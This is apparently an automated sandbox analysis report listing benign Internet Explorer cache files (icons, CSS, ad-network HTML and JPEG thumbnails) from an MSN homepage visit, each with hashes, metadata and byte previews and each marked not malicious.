                                                                                                                                                                                                                                                          SSDEEP:12:6v/74//aaICzkSOms9aEx1Jt+9YKLg+b3OI21P7qO1uCqbyldNEiA67:BPObXRc6AjOI21Pf1dNCg
                                                                                                                                                                                                                                                          MD5:09A4FCF1442AD182D5E707FEBC1A665F
                                                                                                                                                                                                                                                          SHA1:34491D02888B36F88365639EE0458EDB0A4EC3AC
                                                                                                                                                                                                                                                          SHA-256:BE265513903C278F9C6E1EB9E4158FA7837A2ABAC6A75ECBE9D16F918C12B536
                                                                                                                                                                                                                                                          SHA-512:2A8FA8652CB92BBA624478662BC7462D4EA8500FA36FE5E77CBD50AC6BD0F635AA68988C0E646FEDC39428C19715DCD254E241EB18A184679C3A152030FD9FF8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                          Preview: .PNG........IHDR................U....sRGB.........gAMA......a.....pHYs..........o.d...EIDATHK.Mh.A......4.....b.Zoz....z.".....A../.X.../........"(*.A.(.qPAK/......I.Yw3...M...z./...7..}o...~u'...K_...YM...5w1b....y.V.|.-e.i..D...[V.J...C......R.QH.....:....U.....].$]LE3.}........r..#.]...MS.....S..#..t1...Y...g........ 8."m......Q..>,.?S..{.(7.....;..I.w...?MZ..>.......7z.=.@.q@.;.U..~....:.[.Z+3UL#.........G+3.=.V."D7...r/K.._..LxY.....E..$..{. sj.D...&.......{.rYU..~G....F3..E...{. ......S....A.Z.f<=.....'.1ve.2}[.....C....h&....r.O..c....u... .N_.S.Y.Q~.?..0.M.L..P.#...b..&..5.Z....r.Q.zM'<...+.X3..Tgf._...+SS...u........*./.....IEND.B`.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBnYSFZ[1].png
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):560
                                                                                                                                                                                                                                                          Entropy (8bit):7.425950711006173
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/78/+m8H/Ji+Vncvt7xBkVqZ5F8FFl4hzuegQZ+26gkalFUx:6H/xVA7BkQZL8OhzueD+ikalY
                                                                                                                                                                                                                                                          MD5:CA188779452FF7790C6D312829EEE284
                                                                                                                                                                                                                                                          SHA1:076DF7DE6D49A434BBCB5D88B88468255A739F53
                                                                                                                                                                                                                                                          SHA-256:D30AB7B54AA074DE5E221FE11531FD7528D9EEEAA870A3551F36CB652821292F
                                                                                                                                                                                                                                                          SHA-512:2CA81A25769BFB642A0BFAB8F473C034BFD122C4A44E5452D79EC9DC9E483869256500E266CE26302810690374BF36E838511C38F5A36A2BF71ACF5445AA2436
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                                                          Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.S.KbQ..zf.j...?@...........J.......z..EA3P....AH...Y..3......|6.6}......{..n. ...b..........".h4b.z.&.p8`...:..Lc....*u:......D...i$.)..pL.^..dB.T....#.f3...8.N.b1.B!.\...n..a...a.Z........J%.x<....|..b.h4.`0.EQP.. v.q....f.9.H`8..\...j.N&...X,2...<.B.v[.(.NS6..|>..n4...2.57.*.......f.Q&.a-..v..z..{P.V......>k.J...ri..,.W.+.......5:.W.t...i.....g....\.t..8.w...:......0....%~...F.F.o".'rx...b..vp....b.l.Pa.W.r..aK..9&...>.5...`..'W......IEND.B`.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\NewErrorPageTemplate[1]
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1612
                                                                                                                                                                                                                                                          Entropy (8bit):4.869554560514657
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                                                                                                                                                                                                                          MD5:DFEABDE84792228093A5A270352395B6
                                                                                                                                                                                                                                                          SHA1:E41258C9576721025926326F76063C2305586F76
                                                                                                                                                                                                                                                          SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                                                                                                                                                                                                                          SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:res://ieframe.dll/NewErrorPageTemplate.css
                                                                                                                                                                                                                                                          Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\auction[1].htm
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):25716
                                                                                                                                                                                                                                                          Entropy (8bit):5.6789188861836735
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:jdGjQvl2HFdNAD3l2jplxr3l2Y1dNlnYsQRGDGlnzeNBDlnEsS7n0clN1pXROsls:HdC1c1OB/Jd+mbEvJ5YsxULZaNy
                                                                                                                                                                                                                                                          MD5:9B3743A8307C3E7D48CFB4A0BD8BF072
                                                                                                                                                                                                                                                          SHA1:8BE579B3A7B98BB343B82F6508BE741DECFDD53F
                                                                                                                                                                                                                                                          SHA-256:ABCB1E2F4ED073BAC75B4522A379D15DC7911AF5FAB624B843863610FAD4B017
                                                                                                                                                                                                                                                          SHA-512:CBF82B1E676631B1CE5C65A4AF80568D2A134AE369C64BBD1CB29DEF08AB07EC6071C5326250C5100B3BABB5F29FCAF1A06A4FECC7CC2DD9AD4169679E51FBCD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://srtb.msn.com/auction?a=de-ch&b=fe97b5b9dd8e47899b42f75f1a907c33&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&x=&w=&_=1612940400777
                                                                                                                                                                                                                                                          Preview: .<script id="sam-metadata" type="text/html" data-json="{&quot;optout&quot;:{&quot;msaOptOut&quot;:false,&quot;browserOptOut&quot;:false},&quot;taboola&quot;:{&quot;sessionId&quot;:&quot;v2_4fc197396e21ee404d8deeff74626684_949ef371-4ebf-4022-bc1d-a90ae50993e6-tuct71d09f4_1612940404_1612940404_CIi3jgYQr4c_GMCgsubikZexyQEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgE&quot;},&quot;tbsessionid&quot;:&quot;v2_4fc197396e21ee404d8deeff74626684_949ef371-4ebf-4022-bc1d-a90ae50993e6-tuct71d09f4_1612940404_1612940404_CIi3jgYQr4c_GMCgsubikZexyQEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgE&quot;,&quot;pageViewId&quot;:&quot;fe97b5b9dd8e47899b42f75f1a907c33&quot;,&quot;RequestLevelBeaconUrls&quot;:[]}">.</script>.<li class="triptych serversidenativead hasimage " data-json="{&quot;tvb&quot;:[],&quot;trb&quot;:[],&quot;tjb&quot;:[],&quot;p&quot;:&quot;taboola&quot;,&quot;e&quot;:true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="3" data-viewability="">
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\checksync[1].htm
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):20808
                                                                                                                                                                                                                                                          Entropy (8bit):5.301493036290279
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:RpAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:386qhbz2RmF3OssQWwY4RXrqt
                                                                                                                                                                                                                                                          MD5:72C1F1F3F129C727E7B71E4873CC2B9F
                                                                                                                                                                                                                                                          SHA1:18352C21C278361D11A7C9536A0B65CE08DE44CC
                                                                                                                                                                                                                                                          SHA-256:C9B5A016306FD45301DC8F69359D1B1C983F6661F22990A72EF15026FC334BBF
                                                                                                                                                                                                                                                          SHA-512:B58D34ACDFA63F54E3C47C76B2E9A3F7789FB07087846A15535BBD9472FC44D74576005783DFA50057D320D351D2B82BD05DF8126D9444EB06F37D10E6822A0D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\checksync[2].htm
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):20808
                                                                                                                                                                                                                                                          Entropy (8bit):5.301493036290279
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:RpAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:386qhbz2RmF3OssQWwY4RXrqt
                                                                                                                                                                                                                                                          MD5:72C1F1F3F129C727E7B71E4873CC2B9F
                                                                                                                                                                                                                                                          SHA1:18352C21C278361D11A7C9536A0B65CE08DE44CC
                                                                                                                                                                                                                                                          SHA-256:C9B5A016306FD45301DC8F69359D1B1C983F6661F22990A72EF15026FC334BBF
                                                                                                                                                                                                                                                          SHA-512:B58D34ACDFA63F54E3C47C76B2E9A3F7789FB07087846A15535BBD9472FC44D74576005783DFA50057D320D351D2B82BD05DF8126D9444EB06F37D10E6822A0D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\http___cdn.taboola.com_libtrc_static_thumbnails_64879b5062065d050d314dd3ca506f0a[1].jpg
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):44495
                                                                                                                                                                                                                                                          Entropy (8bit):7.973503134497021
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:HQcVRpGKc95SQ0SOFNCcLyApZVJ81sn6DCQhOb4oi+BTVi2k4PW1xioWN35YF:RBdc/SQEFQcA1+jco/k1xifNy
                                                                                                                                                                                                                                                          MD5:0495A464281FEE3EFD033C1E40ADE8F2
                                                                                                                                                                                                                                                          SHA1:C2B99A52A770B09F775D3EB606CD1DD1ACFEBAF9
                                                                                                                                                                                                                                                          SHA-256:9A2DF397449989900209A02C629FECE70D2D1FB94951FDAC77842D43FE121D6D
                                                                                                                                                                                                                                                          SHA-512:E15FDAE857938F3D79DB92E3988C614FA7332B2442AE149F8A41646E227874453600A1F9A5F39E4D738C3DF72D7B7FA88CCCA756FEFA9E8D5C78641BC0B8DA31
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%2Cg_xy_center%2Cx_492%2Cy_321/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F64879b5062065d050d314dd3ca506f0a.jpg
                                                                                                                                                                                                                                                          Preview: ......JFIF.............$ICC_PROFILE.......appl....mntrRGB XYZ .........7.6acspAPPL....APPL...........................-applc.....1.;;B..u.................................desc.......fcprt...d...#wtpt........rXYZ........gXYZ........bXYZ........rTRC........chad.......,bTRC........gTRC........desc........BenQ GL2760.................................................................................text....Copyright Apple Inc., 2020..XYZ .......R........XYZ ......o...8.....XYZ ......b.........XYZ ......$.........para............sf32.......?.......(.......................y...........................................................&""&0-0>>T.............................................$ $.5-*-5@99@QMQjj.......7...............7........................................................................D.4.=.p.."...=.}.1.U#,U..@f.k.....]..^.Yh./.... .E....A.Wr..RH.^...T..:T...Z>}j.uK.r.........?+.U>...../E-......d.P.#....!.x..D..N....'$.Z.Y... .;.E.]._.].].......w<...*.<#/...(1d.p.xt."
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\https___console.brax-cdn.com_creatives_b9476698-227d-4478-b354-042472d9181c_TB1813_1200x800_1000x600_dc50ae7dd7f119b94c09edb195c1bb8e[1].jpg
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):19305
                                                                                                                                                                                                                                                          Entropy (8bit):7.967008425870337
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:aYxPiSRWO/FDL2coduthmS3d/3dcxP6dP4/aZrogHt:aZ4nFL2coEthmSN/3dct6b
                                                                                                                                                                                                                                                          MD5:30939BEFE688393E77D9FB1A40332FD2
                                                                                                                                                                                                                                                          SHA1:3BCDE0BBB03ECE8F53A29583880E1EA598563969
                                                                                                                                                                                                                                                          SHA-256:0A74990CF6E3033D3280EFF2A5506AB940B1DF6F48AF49011164129D5B7EEEE0
                                                                                                                                                                                                                                                          SHA-512:74966474BB18F8B0F4808B66985F9FF1EB560AAEC83D3255797EB3D5A85E4ED09994E15B0D6FE4A83CC3F64E2C3F0305DEA296D9B5924536EB1A2619571186DF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2FTB1813_1200x800_1000x600_dc50ae7dd7f119b94c09edb195c1bb8e.png
                                                                                                                                                                                                                                                          Preview: ......JFIF.....................................................................&""&0-0>>T.......................................................&""&0-0>>T......7...."..........6....................................................................z.......&jg*vd..VC...p..E..Y..zb..p....w 3..1k..t.Q.5.^\M9..q.Vl..'.b8e.{Q........Hy..:.%KB\.,?...g.`.}.&v..JnJ..]VL..q..^........[*.=..xu,.....jp..P...:`Lk..."..I...R.......b.Xzi........N.wUR....w..<......"..d.#W..LJ...".C.....ZH.j.u.:h....K..q.Oq.^Pj...){x.o.i...^.%..\.;..?..Gcy.=M....q.....e..e,)./.@.$....}.4W......z...!].y.d6.Y......v!P.......i.0..f.\.J..,@W...%Zl.q&.J...o.Qgx..^....Z.|.G......Z*.P&f....v...d."...l...2T.Z<.}....W..5..I#C)FMS...G.......G.....;.Xm2....Y.B:.......O...y.!...$dt......M...3d...r....?fIN....Y...F./2...DK.N..4oJ'b...,...Z....[i....zt....S...... 2.w.-..dJ.|.k..zV..U....<bc(..T3..v..n.}...UItK.n..w..u.......Z.d...<...G.t6......v8..$G.......rL.~.....ui.\.....gk....Ek>mS.%...A
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\medianet[1].htm
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):382409
                                                                                                                                                                                                                                                          Entropy (8bit):5.485041279553666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:4g29Tw5qIZvbBH0m9Z3GCVvgz56Cu1bEa3Cv4IW:kIZvdP3GCVvg4xVz3E4IW
                                                                                                                                                                                                                                                          MD5:FE0D031719B74572B78AD7309BB58760
                                                                                                                                                                                                                                                          SHA1:9FA7A1146F9FDDB3B6D662FBE2578062242DFF41
                                                                                                                                                                                                                                                          SHA-256:6D2A319ABF1D0F13E60C4DA53AFCAC3C88D0DB9BC09C953087203B83482783A6
                                                                                                                                                                                                                                                          SHA-512:DB6B3D457435D75D233192572BE2E980D6299260E0E7481557897F207958C708F2EABAD1904A006B105A09F69649C99FA27694E6C7FC4483333537C675821D4F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                                                                                                                                                                                                                                                          Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\medianet[2].htm
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):382408
                                                                                                                                                                                                                                                          Entropy (8bit):5.485032449637103
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:4g29Tw5qIZvbBH0m9Z3GCVvgz56Cu1bEa3Cv4IW:kIZvdP3GCVvg4xVz3E4IW
                                                                                                                                                                                                                                                          MD5:CFDA5A7035DB6E17E66312ADCABBF188
                                                                                                                                                                                                                                                          SHA1:618C0D9F4C57756105EE0FB1C3E97FBA9B7CBC93
                                                                                                                                                                                                                                                          SHA-256:EE9070904AF699A3E114B34203A4C65CD5F2D79078533973BC9983962DAAAD25
                                                                                                                                                                                                                                                          SHA-512:E54A26577FC9A1C1F6343C80C051DF51A1F7BCA889BE14837AE236583745B9B4AFD88A3BBB922BE1F3EC00E51A651BFF98D433746461CF2A861DD2968A922275
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                                                                                                                                                                                                                                                          Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\39ab3103-8560-4a55-bfc4-401f897cf6f2[1].jpg
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):64434
                                                                                                                                                                                                                                                          Entropy (8bit):7.97602698071344
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:uvrPk/qeS+g/vzqMMWi/shpcnsdHRpkZRF+wL7NK2cc8d55:uvrsSb7XzB0shpOWpkThLRyc8J
                                                                                                                                                                                                                                                          MD5:F7E694704782A95060AC87471F0AC7EA
                                                                                                                                                                                                                                                          SHA1:F3925E2B2246A931CB81A96EE94331126DEDB909
                                                                                                                                                                                                                                                          SHA-256:DEEBF748D8EBEB50F9DFF0503606483CBD028D255A888E0006F219450AABCAAE
                                                                                                                                                                                                                                                          SHA-512:02FEFF294B6AECDDA9CC9E2289710898675ED8D53B15E6FF0BB090F78BD784381E4F626A6605A8590665E71BFEED7AC703800BA018E6FE0D49946A7A3F431D78
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
                                                                                                                                                                                                                                                          Preview: ......JFIF.............C....................................................................C.......................................................................,.,.."...........................................Q............................!.1A."Qaq......#2...$B...3Rb.%CS...&4Tr..(56cs.....................................F......................!...1..AQ"aq.2....BR....#3..Cb....$Sr..&FTc...............?...N..m.1$!..l({&.l...Uw.Wm...i..VK.KWQH.9..n...S~.....@xT.%.D.?....}Nm.;&.....y.qt8...x.2..u.TT.=.TT...k........2..j.J...BS...@'.a....6..S/0.l,.J.r...,<3~...,A....V.G..'*....5].....p...#Yb.K.n!'n..w..{o..._........1..I...).(.l.4......z[}.Z....D2.y...o..}.=..+i.=U.....J$.(.IH0.-...uKSUm*P..T.5..H.6.....6k,8.E....".n.......pMk+..,q...n)GEUM..UUwO%O...)CJ&.P.2!!..........D.z...W...Q..r.t..6]... U.;m...^..:*.k.ZO9...#...q2....mTu..Ej....6.)Se.<.*.....U.@...K.g\D.../..S....~.3 ....hN.."..n...v.?E^,.R<-.Y^)...M.^a.O.R.D...;yo.~..x;u..H.....-.%......].*.
                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\7d5dc6a9-5325-442d-926e-f2c668b8e65e[1].jpg
                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):66293
                                                                                                                                                                                                                                                          Entropy (8bit):7.9773684116122086
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:KkV1hxK2k6bzoUU5U7bbMxQBSzcKzEfwWBr6LiUl6gKdB:KkVnxK2k6foUfboGkEfaLzlpcB
                                                                                                                                                                                                                                                          MD5:C1AAE4AE63634F2F9E9A4381341FED8E
                                                                                                                                                                                                                                                          SHA1:A835A72FF8D848F6188C893CC523533DA5D4EBBD
                                                                                                                                                                                                                                                          SHA-256:0EF4722486B5CE27F71AC5C43DFF1D79BA9276C6D97CE4384787C3151885E259
                                                                                                                                                                                                                                                          SHA-512:22F12EAE69B9433D14788F56A034A7170CCA8D57F7FADA610A5F1417F8B67D0AE215B09384C41C6CABB09C91830B88FC75D85F85A6F67971C44396009AF387A0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          IE Cache URL:https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9
